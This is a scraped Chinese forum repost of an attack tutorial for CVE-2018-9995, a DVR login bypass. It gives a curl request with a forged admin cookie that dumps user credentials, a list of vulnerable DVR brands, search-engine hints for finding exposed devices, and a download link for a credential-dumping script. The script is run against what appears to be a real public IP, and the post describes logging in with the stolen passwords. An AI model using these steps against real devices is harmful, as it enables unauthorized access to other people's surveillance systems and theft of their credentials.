cve-2018-9995 dvr登陸繞過漏洞

時間 2019-11-08

標籤 cve dvr 登陸繞過漏洞简体版

原文原文鏈接

本帖最後由 Snow狼於 2018-6-4 10:27 編輯python

dvr登陸繞過漏洞
此漏洞容許×××者構造一個cookie便可登陸
漏洞語句：curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
測試有此漏洞的dvr：
Novo
CeNovo
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MVDR Login
用shodan查詢：
linux

用zoomeye查詢：

工具連接：https://pan.baidu.com/s/1X96sJRIwHZcnoBOcWq2CpQ密碼：dcoc
依舊是咱們的linux基礎命令：
unzip 解壓
cd 到文件目錄
pip install -r requirements.txt
注意：getDvr爲啓動腳本下圖的紅框框

python2.7 getDVR_Credentials.py --host (ip地址) 59.152.178.44 --port (端口) 9000

看紅圓圈便是爆出來的密碼而後訪問那個IP地址填寫用戶名和密碼就能夠登入了

這就基本顯示出來了曬幾張成果圖

promise

相關標籤/搜索